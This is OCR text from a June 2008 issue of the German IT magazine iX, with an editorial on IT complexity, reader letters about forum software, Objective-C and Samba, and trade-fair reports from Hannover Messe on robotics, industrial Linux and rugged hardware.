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EDITORIAL 


Juni 2008 


Die Komplexitätsfalle 


er in der IT-Welt zu Hause ist, 

weiß, dass sich sein Beschäfti- 
gungsfeld nicht gerade durch beson- 
dere Übersichtlichkeit auszeichnet. 
Zahllose sogenannte Standards, Frame- 
works, Vorgehensweisen und Archi- 
tekturkonzepte beispielsweise in der 
Enterprise-Java-Disziplin sollen dem 
Entwickler zwar eigentlich die Arbeit 
erleichtern, steigern aber allein durch 
ihre schiere Menge die Verwirrung. 
Und einige als Revolutionen angekün- 
digte Erscheinungen wie Enterprise 
Java Beans gelten unter Kennern sogar 
als mittlere Katastrophe. Jede Release 
verspricht, einfacher zu sein als die 
letzte, kann sich mit ihrem Vorgänger 
jedoch nicht mehr unterhalten. Für den 
Unbedarften riecht das Ganze nach 
dem Spaghetti-Code von morgen. 


Auffällig häufig benutzen Keynote- 
Redner, Referenten und Autoren den 
Terminus „Problem“. Knifflige Auf- 
gaben gibt es in der Systementwick- 
lung tatsächlich zuhauf: Komplexität 
entsteht nicht nur durch neue Anforde- 
rungen, sondern auch durch die rasant 
steigende Anzahl von Beziehungen 
zwischen den beteiligten Menschen 
und Maschinen. Zusätzliche Schwie- 
rigkeiten verursacht der Effekt der 
Emergenz: Mannigfaltig gekoppelte 
natürliche oder künstliche Systeme 
entwickeln regelmäßig neue und nicht 
vorhersehbare Eigenschaften. 
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Trotz der in den letzten Jahren enorm 
verfeinerten Werkzeuge und Techni- 
ken verhalten sich etwa Enterprise- 
Anwendungen immer noch ziemlich 
dumm. Der Aufwand steht hier oft in 
keinem gesunden Verhältnis zum 
Ergebnis. Frustrierte Anwender, hoher 
Schulungsaufwand, Inkonsistenzen, 
wucherndes Schnittstellengestrüpp, 
Altlasten, Bürokratie — alles wie 
gehabt. IT und Geschäft fremdeln 
immer noch, obwohl Hersteller von 
Werkzeugen für das Managen von 
Geschäftsprozessen gern darauf hin- 
weisen, dass sogar der Anwender aus 
der Fachabteilung ihre Produkte 
bedienen können soll. 


Der IT-Markt scheint nicht nach 
drögen kaufmännischen Regeln zu 
ticken, sondern orientiert sich eher an 
irrationalen Veranstaltungen wie dem 
Pop-Business. Skurrile, manchmal 
quasireligiöse Berufsbezeichnungen 
deuten darauf hin, dass hier nicht der 
nüchterne Techniker die Szene 
beherrscht. Die Java-Gurus, BPM- 
Päpste und Open-Source-Evangelisten 
haben klar die Deutungshoheit. 


Prof. Nikolaus Wulff von der FH 
Münster lieferte auf der diesjährigen 
JAX („Die Grenzen der Komplexität“) 
zwar auch keine Lösung, aber zumin- 
dest eine Erklärung für das Dilemma. 
In allen Systemen gibt es Phasen des 
Übergangs, geprägt von Instabilität, 
Chaos und evolutionären Sackgassen. 
All diese Systeme streben jedoch 
eifrig danach, wieder ein stabiles 
Gleichgewicht zu erreichen. Insgesamt 
ist der Druck im Kessel enorm hoch, 
die Grenzen der Skalierbarkeit sind 
bald erreicht. Fundamentale Änderun- 
gen erwartet Wulff allerdings erst in 
den nächsten 10 bis 15 Jahren. Etwas 
Dampf entweicht zurzeit nur über 
Ausweichstrategien wie schnellere 
Rechner, Grid Computing und Virtua- 
lisierung. 


Miko Matsumura, Vice President und 
Deputy CTO (sic!) der Software AG 
schlug auf derselben Veranstaltung 
vor, aus Gründen der Komplexitäts- 
reduzierung alle Beziehungen zwi- 
schen Maschinen und Menschen in 
einem Repository auszulagern. Zufäl- 
lig verkauft sein Arbeitgeber dafür ein 
geeignetes Werkzeug. Ansonsten solle 
man sich auf gemeinsame Standards 
und Vorgehensweisen einigen („let’s 
agree“, hat nachweislich noch nie 
richtig funktioniert). Dafür bietet die 
IT-Industrie selbstverständlich die not- 
wendigen Softwareprodukte. Die fir- 
mieren unter den Begriffen Gover- 
nance und Compliance und sollen 
endlich für Ordnung sorgen. Aber 
auch dafür gibt es Tools, Standards 
und Frameworks. Und so bleibt die IT 
vorerst das, was sie schon immer war: 
Die größte Arbeitsbeschaffungsmaß- 
nahme aller Zeiten. 


eg din 


JÜRGEN DIERCKS 
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Im wahrsten Sinne des Wortes „wie auf Schienen” soll die Entwicklung 
einer Webabwendung mit dem Framework Ruby on Rails laufen. Im ersten 
Teil des Tutorials geht es um die dennoch nötigen initialen Tätigkeiten. 


Aufschwungserwartungen: IT-Gehälter 2008 


Trotz vielfach beklagten Fachkräftemangels sind die Gehälter in der IT 
kaum gestiegen - die Gewerkschaften konstatieren sogar Einkommensein- 
bußen. Die Wahrheit erschließt sich wie so oft erst auf den zweiten Blick. 
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Linux vs. Microsoft: 
Small Business Server 


Microsofts Small Business Server galt einmal als konkurrenzlos, 
wenn es um eine problemarme All-in-one-Lösung für kleine und 
mittlere Unternehmen ging. Doch mittlerweile ist im Linux-Lager 
Konkurrenz entstanden. Ob diese schon mithalten kann und ein 
schonungsloser Blick auf die Sicherheitslage auf den 


Marktübersicht: 
E-Mail-Appliances 


Spam hin, Spam her - E-Mail bleibt 
der meistgenutzte Internetdienst. 
Gerade darum ist vielleicht das Auf- 
setzen eines eigenen Mailservers 
vielen Administratoren zu heikel, 
und sie greifen lieber auf vorkon- 
figurierte Appliances zurück. 
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LESERBRIEFE 


Juni 2008 


Quelle gesucht 


(Recht: Zurückholen ausgelagerter Dienstleistun- 


gen; iX 4/08; S: 126) 


Ich genieße regelmäßig Lektüre nicht 
nur der iX-Redaktion, sondern aus dem 
ganzen Hause Heise. Sehr interessiert 
hat mich der Artikel „Alles auf An- 
fang“ von Herrn Meyer-Spasche, in 
dem es um das Backsourcing ausgela- 
gerter Dienstleistungen geht. Erwähnt 
wird, dass nur 30 % der Outsourcing- 
Kunden zufrieden seien, was Statisti- 
ken belegen würden. Nur, welche Sta- 
tistiken sind dies? Es ist leider keine 
Quelle angegeben. Ich finde überwie- 
gend gegenteilige Aussagen. 


TIMO ABEND, VIA E-MAIL 


Im Wesentlichen bezog ich mich auf die 
folgenden Studien: 
— „Sourcing-Studie 2007“ des Maga- 
zins CIO (zusammen mit TU München 
und Deloitte), die mir leider nur in Pa- 
pierform (Heft 05/2007) vorliegt (einen 
Pressespiegel gibt es unter www.pres 
seportal.de/pm/39396/980540/idg_cio_ 
it_wirtschaftsmagazin); 
— „Outsourcing Report 2008“ von De- 
loitte (Download unter www.deloitte. 
comldtt/cda/doc/content/2008%200SR 
%20-%20Why%2Osettle%20for%2Oless 
%281%29.pdf). Diese Studie muss man 
besonders sorgfältig lesen, denn sie 
suggeriert zu Beginn gerade 70 % Zu- 
friedenheit — weist dann aber selbst auf 
den Widerspruch zu den sonstigen Er- 
gebnissen hin. 
- TPI Outsourcing Analyse 2007, in 
Kurzform verfügbar unter www.tpi. 
net/pdfiresearchreports/Restructuring_ 
ResearchReport%20Jan_24_07 pdf 
(Georg Meyer-Spasche) 


Eix-ink ix0806008 


Enttäuschend 


(Interaktives Web: Software für Onlineforen; 


iX 5/08; 5.38) 


Sehr hatte ich mich auf einen Artikel 
zum Thema Forensoftware gefreut. 
Allerdings machte die Vorfreude ausge- 
wachsener Enttäuschung Platz, als ich 
den Artikel wirklich zu lesen bekam. 
Wurde in der Einleitung ausgiebig 
auf die besonderen Sicherheitsprobleme 
von Forensoftware hingewiesen, wurde 
in der eigentlichen Gegenüberstellung 
nicht auf die Abwehrstrategien einge- 
gangen. Gerade ein solcher Blick „unter 


die Haube‘ wäre eine interessante Ver- 
gleichsachse gewesen, die über die In- 
formationen auf den Herstellerhome- 
pages hinausgegangen wäre. Gerade auf 
die „wunden Punkte“ wie die Abwehr 
von Mime-Sniffing XSS in Dateiup- 
loads hätte man eingehen müssen. 

Ähnliches könnte man über die 
Möglichkeiten der Anbindung an beste- 
hende Anwendungen sagen. Auch Hin- 
weise auf strategische Partnerschaften, 
wie etwa zwischen phpBB und Joom- 
la! wären für manche Leser wissens- 
wert gewesen. 

Auch wurde oft der Eindruck von Al- 
leinstellungsmerkmalen erweckt, etwa 


DR 


Fax: 05 11/53 52-361 
Postfach 61 04 07 | E-Mail: <user>@ix.de 
30604 Hannover | Web: www.ix.de 


Direktwahl zur Redaktion: 05 11/53 52-387 


Für telefonische Anfragen zu Artikeln, techni- 
schen Problemen, Produkten et cetera steht die 
Redaktion wie gewohnt während der Leser- 
sprechstunde zur Verfügung. Und zwar: 


Redaktion iX 


Montag bis Freitag, 11 bis 12 Uhr 


Bitte nur während der genannten Zeiten 
anrufen und möglichst die angegebene 
Durchwahl benutzen. 


<Durchwahl> <user> 
-387 post Redaktion allgemein 
-377. avr (Andre von Raison) 
-590 ck (Christian Kirsch) 
-387 cle (Carmen Lehmann) 
-374 hb [Henning Behme] 
-379 id (Jürgen Diercks] 
-386 is (Jürgen Seeger] 
-367 ka [Kersten Auel) 
-153 mm [Michael Mentzel) 
-787 mr [Michael Riepe) 
-373 rh (Ralph Hülsenbusch] 
-689 sun [Susanne Nolte) 
-368 un (Bert Ungerer) 
-595 ur (Ute Roos) 
-384 wm (Wolfgang Möhle] 


Listing-Service: 

Sämtliche in iX seit 1990 veröffentlichten Lis- 

tings sind über den iX-FTP-Server erhältlich: 

fip.heise.de/pub/ix/ 

Ein Bei Artikeln mit diesem Hinweis 
können Sie auf www.ix.de das zuge- 

hörige Argument [ixJJMMSSS] eingeben, um 

eine klickbare Liste aller URLs zu bekommen. 
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der Hinweis auf die Tabellenlosigkeit 
des Burning Boards - z. B. ist auch 
das phpBB tabellenfrei bzw. verwen- 
det Tabellen semantisch korrekt. 
Schließlich - ich gebe zu, keineswegs 
neutral in diesen Fragen zu sein — war 
der wertende Hinweis auf RSS und 
dessen Abwesenheit bei phpBB frag- 
würdig. Zum einen gibt es phpBB Mo- 
dule für RSS, zum anderen ist ein Pull- 
Medium für Foren mit ACL schlecht 
geeignet. Daher setzt phpBB auf Push 
mit Jabber und E-Mail. 

Jedenfalls wären harte Benchmarks 
sehr erfreulich gewesen. 

Nichtsdestotrotz: danke für die 
Übersicht - Foren sind neben Blogs ein 
sehr häufiger Wunsch für Homepages. 
Etwas neutrale Information tat Not. 


HENRY SUDHOF, BERLIN 


Gewaltige Mängel 


(Interaktives Web: Software für Onlineforen; 


iX 5/08; S.38) 


Ich möchte sie darauf hinweisen, dass 
Ihr aktueller Leitartikel für Forensoft- 
ware gewaltige Mängel enthält. 

1. ist das wBB3.0 im Sommer 2007 
erschienen. 

2. beherrscht das wBB3.0 eigene 
BBCodes, diese können über das ACP 
angelegt werden. 

3. sollten Sie ihre Quellen genauer 
prüfen und eventuell die Forensoftware 
kaufen und selbst testen und sich nicht 
nur auf dritte Quellen verlassen. 


KARSTEN ACHTERRATH, 
VIA E-MAIL 


Kleiner Fauxpas 


(Embedded Systems: Entwicklung mit dem iPhone 
SDK; iX 5/08; S. 131) 


Vielen Dank für den Artikel, der einen 
schnellen Überblick zur iPhone-Ent- 
wicklung schafft. Auf einen kleinen 
Fauxpas muss ich Sie aber hinweisen: 

Objective-C kennt keine Methoden, 
die runde Klammern benutzen. 

Im Artikel besprechen Sie Metho- 
den, die applicationDidFinishLaun- 


Die iX-Redaktion behält sich Kürzungen und 
auszugsweise Wiedergabe der Leserbriefe vor. 
Die abgedruckten Zuschriften geben ausschließ- 
lich die Meinung des Einsenders wieder, nicht 
die der Redaktion. 
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ching() und addSubview() heißen sol- 
len. Tatsächlich sind die Namen aber 
applicationDidFinishLaunching: und 
addSubview:. 

Die Wichtigkeit der Unterscheidung 
wird an zwei Beispielen klar. 

l. Methoden mit mehreren Argu- 
menten: In Java wird serObjectForKey 
(Object anObject, String aKey) zu set- 
ObjectForKey(). 

In ObjC wird setObject:(Object)an- 
Object forKey:(NSString)aKey zu set- 
Object:forKey:. 

2. Dynamische Methodenaufrufe: 
@selector(addSubview()) ist ein Syn- 
tax-Error. @selector(addSubview:) ist 
richtig. 


ALEXANDER SPOHR, 
VIA E-MAIL 


Windows 2008 
und Samba 


(Samba-Tutorial III: Samba als primärer Domä- 


nencontroller; iX 5/08; S. 140) 


Ist es möglich, mit Ihrem Tutorial ei- 
nen Samba-Server 3.0.28 als Domä- 
nenmitglied in eine Windows-Server- 
2008-Domäne einzubinden ? 


ANDREAS KUCZERA, MAINZ 


Nein, leider bringt Windows 2008 ei- 
nige Änderungen in den Sicherheits- 
policies und im Kerberos mit sich, die 
die 3.0.28 noch nicht beherrscht. 
Selbst die 3.0.28a hat da noch Proble- 
me. Mit den aktuellen Patches, die zur 
3.0.28b führen werden, geht es aber. 
(Volker Lendecke) 


Ergänzungen und Berichtigungen 


(Systeme: Aus System p und i wird Power Sys- 


tems; iX 5/08; S. 18) 


Nicht im wassergekühlten Power 575, 
sondern im Power 595 laufen die Po- 
wer6-Prozessoren mit 5 GHz. Der Po- 
wer 575 arbeitet mit 4,7 GHz. 


(Vorschau: OS-Business-Modelle/ECM als Open 
Source; iX 5/08; S. 162) 


Aus redaktionellen Gründen mussten 
leider die beiden angekündigten Artikel 
in eine spätere Ausgabe verschoben 
werden. 


MARKT + TRENDS 


Industriemesse 


Neue Schwerpunkte der Hannover Messe: Robotik und Forschung 


Weltweiter Kick-off 


Christopher Kunz 


Fußballspielende Roboter und kuschelnde Elektrorobben tummelten sich auf 
der diesjährigen Hannover Messe. Die konnte mit rund 200 000 Besuchern 
den 2006 befürchteten Abwärtstrend stoppen. 


D: Talsohle scheint durch- 
schritten — im Vergleich 
zum schwach besuchten Ver- 
gleichsjahr 2006 kamen mit 
200 000 Interessenten satte 
30 Prozent mehr zur weltgröß- 
ten Industriemesse in Hanno- 
ver. Obwohl man damit die 
230 000 aus 2007 deutlich ver- 
fehlte, zogen die Organisatoren 
auf ihrer abschließenden Pres- 
sekonferenz ein positives Fazit: 
„Die Hannover Messe fasziniert 
wieder Menschen“, so Sepp D. 
Heckmann, der Vorstandsvor- 
sitzende der Messe AG. Der für 
die Aussteller bedeutsame 
Fachbesucheranteil sei um rund 
25, der der Entscheider um et- 
wa 20 Prozent gestiegen — nach 
den während der Messe durch- 
geführten Umfragen waren al- 
so knapp 180 000 Besucher 
vom Fach und 127 000 be- 
suchten die Messe mit Ent- 
scheidungsbefugnis. 


Gemeinsam gegen 
die Tücken der Technik 


Besonders gut ließ sich die von 
Heckmann festgestellte Fas- 
zination in den diesjährigen 
Schwerpunktthemen Robotik 
und Forschung feststellen — es 
kreuchte und fleuchte alleror- 
ten und bisweilen kam der 
neugierige Besucher sich vor 
wie in einer Fantasiewelt aus 
George Lucas’ Feder. 
Augenfällig war die Anzie- 
hungskraft der verspielten elek- 
tronischen Zeitgenossen in Hal- 
le 25, dem Austragungsort der 
RoboCup German Open. In 
mehreren Disziplinen und Li- 
gen kämpften Roboter gegen- 
einander und ihre Besitzer häu- 
fig gegen die Tücken der 
Technik. Noch kurz vor dem 
Eröffnungsmatch dominierten 
hektische Umbau- und Fehler- 
sucharbeiten die Spielfelder, be- 
vor sich die Roboter im klassi- 
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schen Roboterfußball, dem Hin- 
dernisparcours der „RoboCup 
Rescue“-Liga oder einem Wett- 
bewerb für Serviceroboter — 
Web-2.0-tauglich „RoboCup@ 
Home“ genannt — messen konn- 
ten. Neben vielen europäischen 
Ländern war der Iran mit drei 
Mannschaften vertreten — die 
Teams aus Teheran und Dez- 
foul nahmen an den via Internet 
ausgetragenen Wettbewerben 
zur Robotersimulation teil. 

In der wie in den vergange- 
nen Jahren für Aussteller aus 
Forschung und Wissenschaft 
reservierten Halle 2 kamen 
Science-Fiction-Fans abermals 
auf ihre Kosten. Japan, das 
Partnerland der HMI 2008, 
zeigte Vergangenheit, Gegen- 
wart und Zukunft der Robotik 
mit so unterschiedlichen Ex- 
ponaten wie antiken Miniatur- 
Bogenschützen, anmutigen 
Mannequin-Robotern und ei- 
nem tanzenden Humanoiden. 
Direkt daneben präsentierte 
das AIST, eines der größten 


Forschungsinstitute Japans, 
aktuelle Entwicklungen von 
der Nanotechnologie bis zur 
Robotik. 

Zu den meistfotografierten 
Ausstellungsstücken dürfte PA- 
RO, eine plüschige Babyrobbe, 
zählen. Ähnlich wie bereits im 
Spielzeughandel erhältliche Art- 
genossen reagiert dieser Ro- 
boter auf seine Umwelt, kann 
Verhaltensweisen erlernen und 
Kontakte mit menschlichen 
Bezugspersonen pflegen. Die 
Elektrorobbe wird in Japan seit 
drei Jahren in der Kinder- und 
Senioren-Therapie eingesetzt, 
um Einsamkeit und emotiona- 
lem Stress entgegenzuwirken. 
Paro-Erfinder Takanori Shiba- 
ta kündigte an, das Produkt 
„noch in diesem Jahr“ auch 
nach Europa und die USA zu 
exportieren. 

Deutlich handfester ging es 
bei den Exponaten zur autono- 
men Fahrzeugnavigation zu. 
Gleich mehrere Forschungsein- 
richtungen, darunter das Fraun- 


Der humanoide Roboter HRP-2 kann sogar tanzen. 
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hofer-Institut AIS und die TU 
Braunschweig, präsentierten 
Autos, die an der 2007 letzt- 
malig durch das US-Verteidi- 
gungsministerium ausgerichte- 
ten „DARPA Urban Challenge“ 
teilgenommen haben. Bei die- 
sem Wettbewerb geht es darum, 
das Auto ohne Fahrer oder 
Fernbedienung über eine Hin- 
dernisstrecke auf einem Kaser- 
nengelände zu bewegen, ande- 
ren Autos auszuweichen und 
sich möglichst fehlerfrei im 
Straßenverkehr zu bewegen. 
Diese Aufgabe stellt enorme 
technische Anforderungen an 
die Entwickler, die der Heraus- 
forderung auf unterschiedliche 
Weise begegneten. Der vom 
Fraunhofer IAIS entwickelte 
Wagen nutzt einen 3D-Laser- 
scanner als wichtigste Schnitt- 
stelle zur Außenwelt, um Hin- 
dernisse, andere Wagen und die 
Straße zu erkennen. Dieser La- 
serscanner kann jedoch auch für 
andere Zwecke eingesetzt wer- 
den — etwa zur Planung von 
Schwerlasttransporten oder um 
die Sichtbarkeit und damit die 
Wirkung von Werbeplakaten zu 
testen. 

Für Radfahrer präsentierte 
das Fraunhofer-Institut ein 
adaptronisches Pedal, das an- 
hand eines eingegossenen Pie- 
zosensors messen kann, wie 
gleichmäßig der Fahrer tritt, 
und das diese Daten per Funk in 
Echtzeit übermittelt. Das Pedal 
entstand als Demonstration des 
Projektes InGus, das Gussteilen 
aus Leichtmetall ein elektroni- 
sches Innenleben verleihen soll. 
Dessen eigentliches Ziel ist 
übrigens ein ganz anderes: Man 
will per RFID Raubkopien von 
Autoteilen ermitteln. 


Ergonomische 


Fabriken durch AR 


Fabrikplanung - ein klassi- 
sches Thema der Hannover 
Messe — steht im Mittelpunkt 
eines Exponats des Fraunho- 
fer-Instituts TAO. Das Projekt 
„lTeach“ bietet dem Planer 
die Möglichkeit, mithilfe 
menschlicher Modelle in einer 
dreidimensionalen Umgebung 
Abläufe und Arbeitsstationen 
zu optimieren. Die Mensch- 
modelle können typische Be- 
wegungsabläufe simulieren und 
ergonomische Herausforderun- 
gen wie schmerzhafte oder 
rückenschädigende Haltungen 
deutlich machen. 
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Auch die Firma Metaio setzt 
auf „Augmented Reality“ in 
der Planung von Fabrik- und 
Montagehallen: Anhand eines 
Markers, der auf den Hallenbo- 
den gelegt und fotografiert 
wird, berechnet die Software 
die korrekte Perspektive, und 
Maschinen, Roboter oder 
Polstermöbel lassen sich per- 
spektivisch korrekt direkt in 
der fotografierten Umgebung 
platzieren. Bei der Planung 
neuer Produktionsstraßen in 
bestehenden Gebäuden kann 
man so eventuelle Hindernisse 
bereits im Frühstadium identi- 
fizieren — insbesondere im 
Fahrzeugbau können die Pla- 
ner auf diese Weise teure Feh- 
ler vermeiden. 


Blackberry steuert 


Der Schadensbegrenzung in 
der Produktion dient auch Ex- 
tend 7000 der Schad GmbH. 
Dieses Softwaresystem infor- 
miert die Techniker nicht nur 
über Fehler, sie können auch 
mit ihrem Blackberry-Hand- 
held in die Maschinensteue- 
rung eingreifen. Die Software 
unterstützt auf der Anlagensei- 
te die weit verbreiteten Sima- 
tic-Steuerungen von Siemens. 
Der Java-Client greift auf die 
Infrastruktur von Research in 
Motion zurück, die Daten ge- 
langen über das Mobilfunknetz 
zu der mit dem Internet ver- 
bundenen Maschine. 

Das Projekt „Bingo Voting“ 
vom europäischen Institut für 
Systemsicherheit der Uni 
Karlsruhe hingegen befasste 
sich mit einem eher HMI-unty- 
pischen Thema - der Verifi- 
zierbarkeit von Wahlverfahren. 
Basierend auf einem Zufallsge- 
nerator und einem komplexen 
Sicherheitsprotokoll haben die 
Karlsruher eine Methode entwi- 
ckelt, die jedem Wähler erlaubt, 
die ordnungsgemäße Auszäh- 
lung seiner Stimme zu über- 
prüfen. Das verhindert Wahl- 
manipulation und stärkt das 
Demokratievertrauen. 

Interessierte Jugendliche 
konnten sich bei der Nach- 
wuchsinitiative „TectoYou“ 
über ihre Chancen in der In- 
dustrie informieren. Geführte 
Touren über die Messe und 
Angebote zum Mitmachen 
sollten das Interesse an techni- 
schen Berufen wecken — mehr 
als 20 000 junge Menschen, 
darunter viele Schulklassen, 
folgten dem Angebot. (ka) 
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Open Source meets Industry 


Linux steuert Maschinen 


Barbara Lange 


Linux läuft verstärkt auch im industriellen Umfeld. 
„Open Source meets Industry” - so das Motto der 
eintägigen Sonderveranstaltung auf der Hannover 


Messe. 


enn Open-Source-Soft- 

ware einen Laserstrahl 
steuert, treffen zwei Welten 
aufeinander. Fünf bekannte Li- 
nux-Kernel-Entwickler berich- 
teten den 150 Vertretern von 
Automatisierungsindustrie und 
Maschinenbau von ihrer Arbeit 
am Linux-Kernel und stellten 
dar, was Linux überhaupt ist. 
Veranstalter waren der Ver- 
band Deutscher Maschinen- 
und Anlagenbau VDMA, die 
Deutsche Messe AG und das 
Open Source Automation De- 
velopment Lab OSADL - eine 
eingetragene Genossenschaft, 
die Open-Source-Software in 
besagten Industriezweigen för- 
dert und koordiniert (www. 
osadl.org). Zu den 21 Mit- 
gliedsunternehmen zählen die 
Eltec Elektronik AG, Homag 
Holzbearbeitungssysteme AG, 
Trumpf GmbH + Co. KG und 
Linutronix GmbH. 

Das Programm war auf die 
Einsteiger aus der Industrie 
ausgerichtet. So berichtete Li- 
nux-Kernel-Entwickler Alan 
Cox aus dem Geschichtsbuch 
des freien Betriebssystems, 
Rechtsanwalt Till Jaeger er- 
klärte die aus der Nutzung von 
Open Source resultierenden 
Rechte und Pflichten der Li- 
zenzierung. 


Bessere Ergebnisse 
durch Open Source 


Andrew Morton erläuterte die 
Arbeitsweise der Linux-Com- 
munity und den Aufbau von 
Linux. Vor allem die koope- 
rative Arbeitsweise zeichne 
Open-Source-Software aus und 
führe immer zu besseren Er- 
gebnissen. Umsonst wie zu 
den Pionierzeiten arbeiten da- 
bei nur noch wenige: Nach ei- 
ner Studie der Linux-Founda- 


tion erhalten mittlerweile le- 
diglich 13,9 Prozent der Li- 
nux-Entwickler kein Geld von 
der Industrie, vor allem als 
Tester, wie Linux-Entwickler 
Greg Kroah-Hartmann berich- 
tete. Er forderte die Industrie 
auf, ihnen ihre Treiber-Anfor- 
derungen zu schicken, die sie 
dann unentgeltlich realisieren 
würden. Auch Treiber von sel- 
ten eingesetzter Hardware sol- 
len Bestandteil des Kernels 
werden. 


In der Industrie 
angekommen 


Nach der Einschätzung von 
Carsten Emde, Geschäftsführer 
von OSADL, ist Open Source 
mit dieser Veranstaltung und 
dem Messestand „Application 
Parc“ bei der Industrie ange- 
kommen. Klar wurde, dass die 
Entwickler ernsthaft an den be- 
sonderen Anforderungen arbei- 
ten, die die Industrie an offene 


€ 
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orflirce 


Betriebssysteme stellt. Dazu 
gehören die Echtzeitfähigkeit 
und die Virtualisierung auf 
Kernel-Ebene. Beides ist so gut 
wie realisiert, führte Emde aus. 
Seit Ende 2007 seien große 
Teile des „Real time Preemp- 
tion Patch“ in den Linux-Ker- 
nel 2.6.24. integriert worden. 
Für Industrieunternehmen, 
die den Einsatz von Linux er- 
wägen, lieferte Open-Source- 
„Evangelist‘“ Bruce Perens eine 
interessante Entscheidungshil- 
fe. Er unterschied zwischen 
„differenzierender und nicht- 
differenzierender Software“: 
Erstere macht das besondere 
Know-how von Unternehmen 
aus und sollte geschlossen blei- 
ben. Dieser Anteil beträgt aber 
nur fünf Prozent, so Perens. 
Die überaus deutliche Mehrheit 
von 95 Prozent aller Unter- 
nehmenssoftware sei für alle 
Unternehmen nützlich und da- 
mit nicht differenzierend. Die- 
ser Anteil könne nur Open 
Source sein. (ka) 


Quelle: OSADL, Fotograf Klaus Fricke 


Geschichtsstunde mit Linux-Kernel-Entwickler Alan Cox 


iX 6/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


Industriemesse 
Robuste Tragbare Flacher Panel-PC 


Der Wunsch nach mobilen PCs 
für den Außeneinsatz steigt. 
Kontron (http://de.kontron.com/ 
NotePac/) stellte das rugged 
Notebook NotePAC Uiltra- 
M230N und das Tablet E100 
vor, beide erfüllen die Norm 
IP54 (Spritzwasserschutz). Das 
M230N erfüllt zudem Mil- 
STD-461 und verträgt Stürze 
aus 90 cm Höhe. Zur Ausrüs- 
tung gehört ein 14,1"-XGA- 
oder ein 15,1"-"SXGA-Bild- 
schirm sowie maximal 4 GByte 
RAM, eine 1,5-GHz-Core2- 
Duo-CPU und eine 2,5"-Fest- 
platte mit 250 GByte Kapazität. 

Das Tablet E100 erfüllt Mil- 
STD-810F und darf aus 12m 
Höhe auf Beton stürzen. Die 
Auflösung des 8,4"-SVGA- 
Displays beträgt 800 x 600 Pi- 
xel. Beim 800-MHz-Pentium- 
M handelt es sich um einen 
Ultra Mobil Coremit bis zu 
fünf Stunden Akkulaufzeit. 
Der Speicherausbau endet bei 
1 GByte. Bei der 80-GByte- 
Festplatte setzt der Hersteller 
auf das besonders stoßunemp- 
findliche 1,8"-Format. 

Als Schnittstellen stehen 
USB 2.0, Cardbus, 1-GBit- 


Brennstoffzelle als USV 


Im Brennstoffzellenpark führte 
Rittal einen 5-kW-Generator 
vor. Er besteht aus einem 
1,22 m hohen Schrank mit ei- 
ner Standfläche von 85x85 cm, 
in dem sich die Brennstoffzelle 
mit Zubehör befindet, sowie ei- 
nem Schrank für die Wasser- 
stoffflaschen. Die Anlage liefert 
minimal 1 kW und verbraucht 
bei 3kW 34 slqm (standard li- 
tre per minute) und 63 slqm bei 
5kW. Eine 50-l-Gasflasche 
reicht für 10 kWh. Die Anlage 
liefert 48 V Gleich- oder 230 V 
Wechselspannung. 


LAN sowie Audio bereit. Ge- 
meinsam sind dem E100 und 
dem M230N die Schnittstellen 
von USB bis LAN sowie 
UMTS (HSDPA), WLAN, 
Bluetooth und GSM. Die Do- 
ckingstations sind für den Ein- 
bau im Fahrzeug gedacht. Das 
M230N verfügt zusätzlich über 
ein Modem und RS232, VGA, 
LPT sowie IRDA. 

IPC2U (www ipc2u.de) zeig- 
te das Ruggedbook 800 von 
Rumoco. Es handelt sich um ei- 
nen Tablet-PC mit 10 ,4"-Dis- 
play (1024 x 768), dieser erfüllt 
die Normen MIL810F/461E 
und IP54. Der Temperaturbe- 
reich ist auf den Bereich von 
-20 bis +60 Grad Celsius er- 
weitert. Die Akkulaufzeit be- 
trägt bis zu sieben Stunden. 
IPC2U verwendet Intel-Prozes- 
soren der Yonah-Familie. Es 
passen maximal 2 GByte 
DDRII-RAM in das Gerät, ein 
PCMCIA-Typ-I- und ein Com- 
pact-Flash-Typ-I-Slot dienen 
zur Erweiterung. Erwartungsge- 
mäß verfügt auch dieses Sys- 
tem über WLAN, Bluetooth, 
USB, RS232, GBit-LAN und 
Audio sowie ein Modem. 


Die Brennstoffzelle „ver- 
brennt“ den Wasserstoff mit- 
hilfe des Luftsauerstoffes, der 
über einen Kompressor in die 
Zelle gelangt. Er ist die Ursache 
für die Schallemissionen von 
knapp 60 dB (in einem Meter 
Abstand). Wird der Schrank im 
Außenbereich aufgestellt, er- 
höht sich der Stand-by-Ver- 
brauch von 200 auf 800 W, 
verantwortlich ist dafür eine 
Zusatzheizung für die Zelle. 
Die Wartung soll sich auf einen 
periodischen Luftfilterwechsel 
beschränken. 


Compact PCI gut bestückt 


Dass Compact PCI seinen Na- 
men zu Recht trägt, zeigt die 
Firma EMTrust (www.em 
trust.de) mit dem ICP-PM-8. 
Auf 100 x 160 mm befindet 
sich ein PC mit Pentium 
M760, bis zu einem Gigabyte 
DDR-RAM, ein CF-Sockel 
und eine 2,5"-IDE-Festplatte. 
Auf der zwei Einschübe brei- 
ten Frontplatte befinden sich 
zwei GBit-LAN-, eine VGA-, 


14 


eine PS/2-, drei USB- und 
zwei serielle Schnittstellen 
(RS232/485). Bei der Grafik 
setzt der Hersteller auf eine 
ATI Radeon mit 32 MByte 
RAM, die eine maximale Auf- 
lösung von 2048 x 1536 Pixel 
liefert, sowie ein Panellink- 
Interface zum Anschluss von 
Monitoren mit DVI-Eingang. 
Zur Sicherheit tragen zwei 
Watchdogs bei. 


Der acht Höheneinheiten hohe 
IPPC-7157A Panel PC von 
Advantech (www .advantech. 
de) ist mit einem 15"-TFT 
Touchscreen lieferbar. Die 
Frontseite ist staub- und spritz- 
wassergeschützt, die Einbau- 
tiefe beträgt nur 160 mm. Im 
PPC-7157A ist ein Industrie- 
ATX-Board verbaut, das einen 
PCle-16-, einen PCle-1- und 
fünf normale PCI-Steckplätze 
bietet. Es kommen Prozessoren 


HANNOVER 
MESSE 


mit dem Socket 775 vom Pen- 
tium 4, Celeron D bis zum 
Pentium D (Dual Core) mit bis 
zu 3,2 GHZ infrage. Der Spei- 
cherausbau endet bei 4 GByte 
(DDR2). Als Schnittstellen 
stehen 4x USB 2.0, 2x GBit- 
LAN, ein Parallelport und 
zwei serielle zur Verfügung. 
Bei einer der seriellen Schnitt- 
stellen kann man zwischen 
RS232, RS422 oder RS485 
umschalten. 


